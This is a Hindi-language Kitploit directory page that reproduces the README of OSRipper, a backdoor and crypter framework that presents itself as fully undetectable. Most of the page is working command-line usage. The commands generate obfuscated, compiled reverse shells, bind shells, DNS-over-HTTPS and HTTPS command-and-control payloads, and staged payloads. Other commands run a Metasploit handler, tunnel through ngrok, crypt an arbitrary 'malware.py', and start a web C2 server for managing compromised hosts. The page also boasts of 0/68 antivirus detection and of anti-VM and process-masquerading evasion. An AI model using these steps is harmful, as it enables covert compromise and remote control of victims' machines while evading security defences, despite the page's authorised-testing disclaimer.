Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OSRipper — एंटीवायरस से बचने वाला क्रॉस-प्लेटफ़ॉर्म Backdoor और Crypter Framework एक एकीकृत हल्के वजन वाले webUI के साथ | Kitploit
उपकरण/GitHubGitHub/noahoksuz/osripper
शोषण फ्रेमवर्कपेलोड जनरेशनआईडीएस/आईपीएस से बचनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
GitHubnoahoksuz/osripper

OSRipper

एंटीवायरस से बचने वाला क्रॉस-प्लेटफ़ॉर्म Backdoor और Crypter Framework एक एकीकृत हल्के वजन वाले webUI के साथ

रिपॉजिटरी देखें
32850586 महीने पहलेKitploit द्वारा समीक्षित
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

OSRipper v0.4.2

OSRipper Logo

CodeFactor Python Version License Platform

FUD क्षमताओं के साथ उन्नत क्रॉस-प्लेटफ़ॉर्म पेलोड जनरेटर और क्रिप्टर

विशेषताएँ • त्वरित प्रारंभ • वेब UI • पेलोड प्रकार • दस्तावेज़ीकरण


अवलोकन

OSRipper एक परिष्कृत, पूर्णतः अनडिटेक्टेबल (FUD) बैकडोर जनरेटर और क्रिप्टर है जो अधिकृत पेनिट्रेशन टेस्टिंग और रेड टीम संचालन के लिए डिज़ाइन किया गया है। इसमें उन्नत चोरी तकनीक, एकाधिक पेलोड प्रकार, और समझौता प्रणालियों के प्रबंधन के लिए एक आधुनिक वेब-आधारित C2 इंटरफ़ेस शामिल है।

मुख्य विशेषताएँ

  • पूर्णतः अनडिटेक्टेबल (FUD) - उन्नत चोरी तकनीकें आधुनिक AV समाधानों को बायपास करती हैं
  • वेब-आधारित C2 इंटरफ़ेस - सक्रिय सत्रों के प्रबंधन के लिए आधुनिक डैशबोर्ड
  • एकाधिक पेलोड प्रकार - बाइंड शेल, रिवर्स शेल, DoH C2, HTTPS C2 और अधिक
  • बहु-स्तर अस्पष्टता - यादृच्छिक चर के साथ मानक और उन्नत अस्पष्टता
  • बाइनरी संकलन - पेलोड को स्टैंडअलोन एक्जीक्यूटेबल में संकलित करें
  • एन्क्रिप्टेड संचार - SSL/TLS और प्रमाणपत्र-पिनेड HTTPS C2 चैनल
  • गुप्त सुविधाएँ - VM डिटेक्शन, एंटी-डीबगिंग, प्रोसेस मास्करेडिंग

विशेषताएँ

पेलोड जनरेशन

पेलोड प्रकारविवरणउपयोग का मामला
बाइंड शेलपीड़ित मशीन पर पोर्ट खोलता हैजब रिवर्स कनेक्शन अवरुद्ध हो तो सीधा एक्सेस
रिवर्स TCP मीटरप्रिटरSSL/TLS एन्क्रिप्टेड रिवर्स कनेक्शनमानक पेनिट्रेशन टेस्टिंग
DNS-ओवर-HTTPS C2DoH-आधारित गुप्त कमांड और नियंत्रणनेटवर्क प्रतिबंधों को बायपास करें
HTTPS C2प्रमाणपत्र-पिनेड HTTPS C2सुरक्षित, प्रमाणित C2 चैनल
स्टेज्ड पेलोडबहु-चरणीय वेब वितरणउन्नत गुप्त तैनाती
कस्टम कोड क्रिप्टरकिसी भी Python स्क्रिप्ट को अस्पष्ट करेंकस्टम पेलोड एन्क्रिप्शन

चोरी तकनीकें

  • उन्नत अस्पष्टता - यादृच्छिक चर के साथ बहु-स्तर कोड एन्कोडिंग
  • उन्नत अस्पष्टता - एंटी-डीबग, VM डिटेक्शन, जंक कोड इंजेक्शन
  • एंटी-VM डिटेक्शन - सैंडबॉक्स और वर्चुअल मशीन से बचाव
  • गुप्त विलंब - यादृच्छिक स्टार्टअप विलंब (5-15 सेकंड)
  • प्रोसेस मास्करेडिंग - वैध सिस्टम प्रक्रियाओं के रूप में छिपाना
  • हस्ताक्षर यादृच्छिकीकरण - हर पेलोड अद्वितीय है

वेब UI विशेषताएँ

  • सत्र डैशबोर्ड - सभी सक्रिय C2 सत्र देखें
  • इंटरैक्टिव टर्मिनल - वेब इंटरफ़ेस के माध्यम से कमांड निष्पादित करें
  • पेलोड जनरेटर - वेब UI से सीधे पेलोड जनरेट करें
  • सत्र प्रबंधन - सिस्टम जानकारी, कमांड इतिहास देखें और सत्र प्रबंधित करें
  • रीयल-टाइम अपडेट - लाइव कमांड निष्पादन और प्रतिक्रिया देखना

उन्नत क्षमताएँ

  • Ngrok एकीकरण - डायनामिक IP के लिए स्वचालित टनल निर्माण
  • प्रमाणपत्र पिनिंग - प्रमाणपत्र सत्यापन के साथ सुरक्षित HTTPS C2
  • सत्र स्थिरता - पुनः आरंभ पर कनेक्शन बनाए रखें
  • कमांड क्यूइंग - ऑफ़लाइन एजेंटों के लिए कमांड कतारबद्ध करें
  • प्रतिक्रिया पार्सिंग - कमांड आउटपुट का स्वचालित पार्सिंग

त्वरित प्रारंभ

स्थापना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper

# निर्भरताएँ स्थापित करें
pip3 install -r requirements.txt

# पैकेज स्थापित करें
pip3 install -e .

महत्वपूर्ण — वैकल्पिक सुविधाओं (ngrok, बाइनरी संकलन) के लिए सेटअप चलाएँ:
कई सिस्टमों पर (विशेषकर Linux जिसमें बाह्य रूप से प्रबंधित Python वातावरण है), आपको अनिवार्य रूप से अंतर्निहित सेटअप चलाना होगा ताकि वैकल्पिक निर्भरताएँ OSRipper के स्वयं के venv में स्थापित हों। स्थापना के बाद एक बार यह करें:

root@kitploit:~
osripper-cli setup

यह ~/.local/share/osripper/venv बनाता है, वहाँ pyngrok, nuitka, और sandboxed स्थापित करता है, और osripper / osripper-cli के बाद के सभी रन स्वचालित रूप से उनका उपयोग करेंगे। इसके बिना, --ngrok और --compile आपको सेटअप चलाने का संकेत देंगे। केवल तब osripper-cli setup --system का उपयोग करें यदि आप venv के बजाय सिस्टम/उपयोगकर्ता pip स्थापना पसंद करते हैं।

मूल उपयोग

इंटरैक्टिव मोड:

root@kitploit:~
osripper
# या
python3 -m osripper

कमांड लाइन:

root@kitploit:~
# रिवर्स शेल जनरेट करें
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile

# DoH C2 पेलोड जनरेट करें
osripper-cli doh -d example.com --obfuscate --compile

वेब UI:

root@kitploit:~
# वेब UI के साथ C2 सर्वर प्रारंभ करें
python -m osripper.c2.server example.com --port 5000

# http://localhost:5000 पर डैशबोर्ड तक पहुँचें

वेब UI

OSRipper में समझौता प्रणालियों के प्रबंधन के लिए एक आधुनिक वेब-आधारित C2 इंटरफ़ेस शामिल है।

विशेषताएँ

  • डैशबोर्ड - सभी सक्रिय सत्रों का अवलोकन
  • सत्र प्रबंधन - सिस्टम जानकारी देखें और कमांड निष्पादित करें
  • पेलोड जनरेटर - वेब इंटरफ़ेस के माध्यम से DoH और HTTPS पेलोड जनरेट करें
  • कमांड इतिहास - सभी निष्पादित कमांड और प्रतिक्रिया ट्रैक करें
  • रीयल-टाइम अपडेट - लाइव कमांड निष्पादन और प्रतिक्रिया देखना

C2 सर्वर प्रारंभ करना

root@kitploit:~
# मूल उपयोग
python -m osripper.c2.server example.com

# HTTPS के साथ
python -m osripper.c2.server example.com --https

# कस्टम पोर्ट
python -m osripper.c2.server example.com --port 8080

# कस्टम प्रमाणपत्र के साथ
python -m osripper.c2.server example.com --https --cert server.crt --key server.key

वेब UI तक पहुँचना

एक बार सर्वर चलने पर, डैशबोर्ड तक पहुँचें:

  • HTTP: http://localhost:5000
  • HTTPS: https://localhost:5000 (यदि सक्षम किया गया हो)

पेलोड प्रकार

1. बाइंड शेल बैकडोर

पीड़ित मशीन पर एक पोर्ट खोलता है और कनेक्शन की प्रतीक्षा करता है।

root@kitploit:~
osripper-cli bind -p 4444 --obfuscate --compile

कनेक्शन:

root@kitploit:~
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'

2. रिवर्स TCP मीटरप्रिटर

SSL/TLS के साथ एन्क्रिप्टेड रिवर्स कनेक्शन।

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced --compile

3. DNS-ओवर-HTTPS C2

DNS-ओवर-HTTPS प्रोटोकॉल का उपयोग करके गुप्त C2 चैनल। कई नेटवर्क प्रतिबंधों को बायपास करता है।

root@kitploit:~
# पेलोड जनरेट करें
osripper-cli doh -d example.com --obfuscate --compile

# C2 सर्वर प्रारंभ करें
python -m osripper.c2.server example.com

विशेषताएँ:

  • DNS-आधारित संचार में गुप्तता
  • सत्र प्रबंधन के लिए वेब UI
  • स्वचालित सत्र स्थिरता
  • ऑफ़लाइन एजेंटों के लिए कमांड क्यूइंग

4. HTTPS C2 (प्रमाणपत्र पिनिंग)

प्रमाणीकरण के लिए प्रमाणपत्र पिनिंग के साथ सुरक्षित HTTPS C2।

root@kitploit:~
# पेलोड जनरेट करें (वेब UI या CLI के माध्यम से)
# HTTPS के साथ C2 सर्वर प्रारंभ करें
python -m osripper.c2.server example.com --https

# प्रमाणपत्र फिंगरप्रिंट प्राप्त करें
curl http://localhost:5000/api/cert-fingerprint

विशेषताएँ:

  • सुरक्षा के लिए प्रमाणपत्र पिनिंग
  • एन्क्रिप्टेड HTTPS संचार
  • वेब UI एकीकरण
  • सत्र प्रबंधन

5. स्टेज्ड पेलोड

उन्नत गुप्तता के लिए बहु-चरणीय वेब वितरण।

root@kitploit:~
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate

6. कस्टम कोड क्रिप्टर

किसी भी Python स्क्रिप्ट को अस्पष्ट और एन्क्रिप्ट करें।

root@kitploit:~
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile

कमांड लाइन इंटरफ़ेस

सामान्य विकल्प

विकल्पविवरण
--obfuscateबहु-स्तर अस्पष्टता सक्षम करें
--enhancedउन्नत अस्पष्टता (एंटी-डीबग, VM डिटेक्शन)
--compileस्टैंडअलोन बाइनरी में संकलित करें
--icon PATHसंकलित बाइनरी के लिए कस्टम आइकन
--delayयादृच्छिक स्टार्टअप विलंब जोड़ें (5-15 सेकंड)
--output, -o NAMEआउटपुट फ़ाइल नाम
--quiet, -qशांत मोड (न्यूनतम आउटपुट)

उदाहरण

root@kitploit:~
# पूर्ण-सुविधा युक्त रिवर्स शेल
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate --enhanced --compile --icon app.ico --delay

# सभी सुविधाओं के साथ DoH C2
osripper-cli doh -d example.com \
  --obfuscate --enhanced --compile --delay

# कस्टम स्क्रिप्ट एन्क्रिप्शन
osripper-cli custom --script malware.py \
  --obfuscate --enhanced --compile

# डायनामिक IP के लिए ngrok का उपयोग
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile

डिटेक्शन परिणाम

नवीनतम VirusTotal स्कैन

  • Python पेलोड: 0/68 डिटेक्शन दर
  • संकलित बाइनरी: 0/68 डिटेक्शन दर

antiscan परिणाम

Antiscan परिणाम


आर्किटेक्चर

root@kitploit:~
┌─────────────────┐
│   जनरेटेड      │
│    बाइनरी       │
└─────────────────┘
         │
         │ निष्पादन
         ▼
┌──────────────────┐
│ अस्पष्ट         │
│ ड्रॉपर          │
└──────────────────┘
         │
         │ HTTP/HTTPS/DoH
         ▼
┌─────────────────┐
│                 │
│   C2 सर्वर     │
│   (वेब UI)      │
│                 │
└─────────────────┘
         │
         │ कमांड/प्रतिक्रिया
         ▼
┌─────────────────┐
│   एजेंट         │
│   निष्पादन      │
└─────────────────┘

स्क्रीनशॉट

मुख्य इंटरफ़ेस

वेब UI डैशबोर्ड

वेब UI डैशबोर्ड


उन्नत कॉन्फ़िगरेशन

Ngrok एकीकरण

root@kitploit:~
# ngrok के साथ पेलोड जनरेट करें
osripper-cli reverse --ngrok -p 4444

# टनल सेट करने के लिए संकेतों का पालन करें
# चलाएँ: ngrok tcp 4444

कस्टम आइकन

root@kitploit:~
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --compile --icon /path/to/icon.ico

अस्पष्टता स्तर

मानक अस्पष्टता:

  • बहु-स्तर एन्कोडिंग
  • चर यादृच्छिकीकरण
  • कोड संरचना अस्पष्टता

उन्नत अस्पष्टता:

  • सभी मानक सुविधाएँ
  • एंटी-डीबगिंग तकनीकें
  • VM डिटेक्शन
  • जंक कोड इंजेक्शन
  • उन्नत चोरी
root@kitploit:~
# मानक
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate

# उन्नत
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --enhanced

HTTPS C2 सेटअप

root@kitploit:~
# 1. HTTPS के साथ C2 सर्वर प्रारंभ करें
python -m osripper.c2.server example.com --https

# 2. प्रमाणपत्र फिंगरप्रिंट प्राप्त करें
curl http://localhost:5000/api/cert-fingerprint

# 3. फिंगरप्रिंट के साथ पेलोड जनरेट करें (वेब UI के माध्यम से)
# या अपने पेलोड जनरेशन में फिंगरप्रिंट का उपयोग करें

दस्तावेज़ीकरण

  • विकी - व्यापक दस्तावेज़ीकरण
  • उपयोग गाइड - विस्तृत उपयोग निर्देश
  • API संदर्भ - डेवलपर दस्तावेज़ीकरण

रोडमैप

पूर्ण (v0.3.2)

  • FUD पेलोड जनरेशन (0/68 डिटेक्शन)
  • वेब-आधारित C2 इंटरफ़ेस
  • DNS-ओवर-HTTPS C2 पेलोड
  • प्रमाणपत्र पिनिंग के साथ HTTPS C2
  • बहु-स्तर अस्पष्टता इंजन
  • सत्र प्रबंधन प्रणाली
  • कमांड क्यूइंग और निष्पादन
  • एंटी-VM डिटेक्शन
  • प्रोसेस मास्करेडिंग

प्रगति पर

  • उन्नत पोस्ट-एक्सप्लॉइटेशन मॉड्यूल
  • उन्नत स्थिरता तंत्र
  • वेब UI के माध्यम से फ़ाइल अपलोड/डाउनलोड
  • C2 सर्वर के लिए बहु-उपयोगकर्ता समर्थन

भविष्य की योजनाएँ

  • AI-संचालित चोरी तकनीकें
  • ब्लॉकचेन-आधारित C2 बुनियादी ढाँचा
  • मोबाइल प्लेटफ़ॉर्म समर्थन
  • उन्नत सोशल इंजीनियरिंग पेलोड

योगदान

हम सुरक्षा अनुसंधान समुदाय से योगदान का स्वागत करते हैं!

योगदान कैसे करें

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएँ (git checkout -b feature/amazing-feature)
  3. अपने बदलाव कमिट करें (git commit -m 'Add amazing feature')
  4. ब्रांच पर पुश करें (git push origin feature/amazing-feature)
  5. एक पुल रिक्वेस्ट खोलें

विकास दिशानिर्देश

  • PEP 8 कोडिंग मानकों का पालन करें
  • सभी फ़ंक्शनों में डॉकस्ट्रिंग जोड़ें
  • एकाधिक प्लेटफ़ॉर्म पर परीक्षण करें
  • सुनिश्चित करें कि FUD क्षमताएँ बरकरार रहें

आभार

सुरक्षा अनुसंधान समुदाय और इन परियोजनाओं को विशेष धन्यवाद:

  • htr-tech/PyObfuscate - अस्पष्टता प्रेरणा
  • cedowens/SwiftBelt - macOS गणना
  • Metasploit Framework - पेलोड हैंडलिंग

कानूनी अस्वीकरण

महत्वपूर्ण: यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पेनिट्रेशन टेस्टिंग के लिए विकसित किया गया है।

  • अधिकृत उपयोग: सुरक्षा अनुसंधान, पेनिट्रेशन टेस्टिंग, रेड टीम अभ्यास
  • निषिद्ध उपयोग: अनधिकृत पहुँच, दुर्भावनापूर्ण गतिविधियाँ, अवैध उद्देश्य

इस सॉफ़्टवेयर के दुरुपयोग के लिए डेवलपर्स जिम्मेदार नहीं हैं। उपयोगकर्ताओं को सभी लागू कानूनों और विनियमों का पालन करना होगा।


समर्थन

  • बग रिपोर्ट: एक समस्या खोलें
  • सुविधा अनुरोध: चर्चाएँ
  • सुरक्षा मुद्दे: निजी तौर पर अनुरक्षकों से संपर्क करें
टूल डाउनलोड करें